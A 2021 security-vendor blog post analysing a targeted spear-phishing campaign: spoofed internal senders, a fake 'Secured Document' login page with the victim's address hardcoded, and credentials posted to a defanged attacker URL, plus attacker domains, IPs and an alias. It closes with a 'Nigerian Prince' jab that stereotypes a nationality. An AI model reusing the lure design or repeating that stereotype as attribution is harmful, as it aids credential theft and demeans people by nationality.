Urgences 24 sur 7 – (888) 287-5858   Connexion au Portail TitanSupport    Contactez-nous      Blogue

Recent Discovery of a Targeted Spear Phishing Campaign

par | Mar 11, 2021

The GoSecure Titan Inbox Detection and Response (IDR) team recently discovered yet another targeted spear-phishing campaign. The campaign targeted over 150 organizations encompassing a varying array of industries from Financial, Automotive, Technology, and Defense Contractors.

The samples utilize many common Business Email Compromise traits. The From is masked to look like it is coming from within the company, there is an attachment of a

targeted-spear-phishing_image-feature
“receipt”, and the Subject denoting that a file is being received. The bad actor went further and attempted to mask it as a Microsoft Office 365 automated email by putting in the Body of the message “Sent Via Microsoft OneDrive”.
targeted-spear-phishing_image-feature
The GoSecure Titan Inbox Detection and Response (IDR) team recently discovered yet another targeted spear-phishing campaign. The campaign targeted over 150 organizations encompassing a varying array of industries from Financial, Automotive, Technology, and Defense Contractors.

The samples utilize many common Business Email Compromise traits. The From is masked to look like it is coming from within the company, there is an attachment of a “receipt”, and the Subject denoting that a file is being received. The bad actor went further and attempted to mask it as a Microsoft Office 365 automated email by putting in the Body of the message “Sent Via Microsoft OneDrive”.

targeted-spear-phishing_image-1
Upon examination of the attachment, it opens the browser and shows a “Secured Document” page prompting the user to log in to view the file. The page looks similar to that of many digital signature sites.
targeted-spear-phishing_image-2
Here is where it gets interesting. Investigating further, we find that the targeted user’s email address and company name are hardcoded into the HTM file. This hardcoding indicates that each attack was uniquely generated to target specific users within their respective organizations.

Further analysis showed that the credentials entered would be sent to hxxps://tradershost[.]com/REDACTED/send.php:

targeted-spear-phishing_image-3
When visiting this page, the browser displays a JSON reply of {“msg”:”empty”} which indicates this phishing kit has its own API. Removing send.php from the URL returns a directory index that lists other pages in the kit. This novice or possibly lazy move of not turning off the directory index display helped in the investigation. One of the pages hosted was marked “admin@paperfoxla.com.txt”. This file appears to be the ‘database’ file of all the usernames and passwords collected so far by this campaign.

GoSecure Titan IDR analyst investigation discovered the Tradershost[.]com website is hosted on an Apache server and appeared to be solely for the use of malicious activity. The content of the website was a PHP web application masked to look like a Stock Trading company.

targeted-spear-phishing_image-4
targeted-spear-phishing_image-5
Through all our research, one thing, in particular, stood out. In the credential files was a name that was taking claim for the spear phishing:
– by *DH4 VIP3R L337 –
Searching for that name on Google revealed multiple websites which contained the same string. One such website was “viperserver11[.]xyz” and included copies of the same phishing kit. These kits, however, appeared to be testing the bad actor’s phishing kit.

GoSecure Titan IDR analysts discovered another website, “uswidefiinancial[.]com”, which appeared to be another hosted phishing campaign.

targeted-spear-phishing_image-6
Our investigation identified one possible slip-up by the bad actor. On the testing that the bad actor did, the same IP addresses showed up. The first IP address, 45.41.180.81, was used by a consumer VPN provider. However (and noted in the above picture), a second address was found. That address, 105.161.23.111, was owned by Safaricom Limited, an ISP in Nairobi, Kenya.

Wrapping up our investigation, we were able to find the bad actor’s name as a YouTube channel. While activity was limited to a single upload from 2016, it is a video from the country we all know when it comes to spam and phishing, Nigeria. Just maybe our Nigerian Prince friend finally ran out of money and changed his occupation.

Using Privacy as a Shield

The bad actor used products and services commonly used to host websites, email, and e-commerce safely, securely, and privately. For example, many hosting companies, including NameCheap, have a service that provides privacy on the WHOIS of a domain. For most, this helps small companies and individuals not to be bombarded with emails and phone calls telling them they can make you the most amazing website or try and push services that are not necessarily needed. However, in the hands of a bad actor, this allows them to mask the information that could help track them down.

All three domains “viperserver11[.]xyz”, “tradershost[.]com”, and “uswidefiinancial[.]com” were masked behind these services to make it harder to gather information. “viperserver11[.]xyz” was utilizing Cloudflare, so the IP address of the server running the site could not be easily discovered. The other two were registered and hosted with NameCheap, a registrar who has a very strict policy of privacy.

Final Thought

The organizations targeted by the campaign come in all sizes, including some very well-known Fortune 500 and Government organizations. It’s comforting to believe that, given the size and cybersecurity budget, some of these organizations are protected from such attacks. As this campaign illustrates, cybercriminals continue to find ways to bypass traditional email gateway solutions, leaving imperfect humans as the organization’s final line of defense. By the time GoSecure Titan IDR analysts discovered the primary server behind this attack, the cybercriminals had already collected 211 unique usernames and passwords from 159 different organizations. Imperfect humans indeed.

Détection et réponse gérées et étendues GoSecure TitanMC (MXDR)

Détection et réponse gérées et étendues GoSecure TitanMC (MXDR) Fondation

Gestion des vulnérabilités en tant que service GoSecure TitanMC (VMaaS)

Surveillance des événements liés aux informations de sécurité gérée GoSecure TitanMC (SIEM gérée)

Défense du périmètre gérée GoSecure TitanMC (pare-feu)

Détection et réponse des boîtes de messagerie GoSecure TitanMC (IDR)

Passerelle de messagerie sécurisée GoSecure TitanMC (SEG)

Modélisateur de menaces GoSecure TitanMC

Identity GoSecure TitanMC

Plateforme GoSecure TitanMC

Services de sécurité professionnels de GoSecure

Services de réponse aux incidents

Évaluation de la maturité de la sécurité

Services de confidentialité

Services PCI DSS

Services de piratage éthique

Opérations de sécurité

MicrosoftLogo

GoSecure MXDR pour Microsoft

Visibilité et réponse complètes au sein de votre environnement de sécurité Microsoft

EN SAVOIR PLUS
OBTENEZ UNE SOUMISSION

CAS D'UTILISATION

Cyberrisques

Mesures de sécurité basées sur les risques

Sociétés de financement par capitaux propres

Prendre des décisions éclairées

Sécurité des données sensibles

Protéger les informations sensibles

Conformité en matière de cybersécurité

Respecter les obligations réglementaires

Cyberassurance

Une stratégie précieuse de gestion des risques

Rançongiciels

Combattre les rançongiciels grâce à une sécurité innovante

Attaques de type « zero-day »

Arrêter les exploits de type « zero-day » grâce à une protection avancée

Consolider, évoluer et prospérer

Prenez de l'avance et gagnez la course avec la Plateforme GoSecure TitanMC.

24/7 MXDR

Détection et réponse sur les terminaux GoSecure TitanMC (EDR)

Antivirus de nouvelle génération GoSecure TitanMC (NGAV)

Surveillance des événements liés aux informations de sécurité GoSecure TitanMC (SIEM)

Détection et réponse des boîtes de messagerie GoSecure TitanMC (IDR)

Intelligence GoSecure TitanMC

Notre SOC

Défense proactive, 24h/24, 7j/7
EN SAVOIR PLUS

À PROPOS DE GOSECURE

GoSecure est un leader et un innovateur reconnu en matière de cybersécurité, pionnier de l'intégration de la détection des menaces au niveau des terminaux, du réseau et des courriels en un seul service de détection et réponse gérées et étendues (MXDR). Depuis plus de 20 ans, GoSecure aide ses clients à mieux comprendre leurs failles en matière de sécurité et à améliorer leurs risques organisationnels ainsi que leur maturité en matière de sécurité grâce aux solutions MXDR et aux services professionnels fournis par l'une des équipes les plus fiables et les plus compétentes de l'industrie.

À propos

Direction

Conseil d'administration

Carrières

CALENDRIER D’ÉVÉNEMENTS

Dec 5 CISOMeet Charlotte
Voir le calendrier
GoSec

DERNIER COMMUNIQUÉ DE PRESSE

SALLE DE PRESSE GOSECURE
DEMANDER UN KIT MÉDIA

BLOGUE GOSECURE

LIRE LA SUITE

RESSOURCES

Livres blancs et rapports

Livres numériques

Études de cas

Fiches techniques et brochures

Webinaires et balados

Vidéos et infographies

Guides techniques

VOIR LA BIBLIOTHÈQUE

AVIS DE SÉCURITÉ

VOIR TOUS LES AVIS
Urgences 24 sur 7 – (888) 287-5858